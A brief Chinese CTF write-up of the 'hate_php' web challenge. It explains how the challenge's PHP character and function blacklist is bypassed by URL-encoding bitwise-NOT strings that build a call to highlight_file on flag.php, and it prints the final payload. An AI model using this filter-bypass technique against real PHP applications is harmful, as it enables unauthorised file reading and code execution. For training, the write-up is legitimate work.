【第五空間智慧安全大賽】hate_php WriteUp

• 2020 年 7 月 6 日
• 筆記
• CTF

環境：//www.ctfhub.com/#/challenge

打開題目可以看到源碼：

閱讀源碼發現過濾掉了f l a g . p h / ; ” ‘ ` | [ ] _ =這些字元，並且還有一些黑名單函數。這讓我聯想到了P神的一篇文章無數字、字母構造webshell (//www.leavesongs.com/PENETRATION/webshell-without-alphanum-advanced.html)

測試發現可以使用：

下面就是要通過該方法構造一些黑名單之外的函數來讀取flag.php中的內容。

這邊好像過濾的不怎麼嚴格直接構造 highlight_file(flag.php)即可讀到flag

payload:

(~%97%96%98%97%93%96%98%97%8B%A0%99%96%93%9A)(~(%99%93%9E%98%D1%8F%97%8F))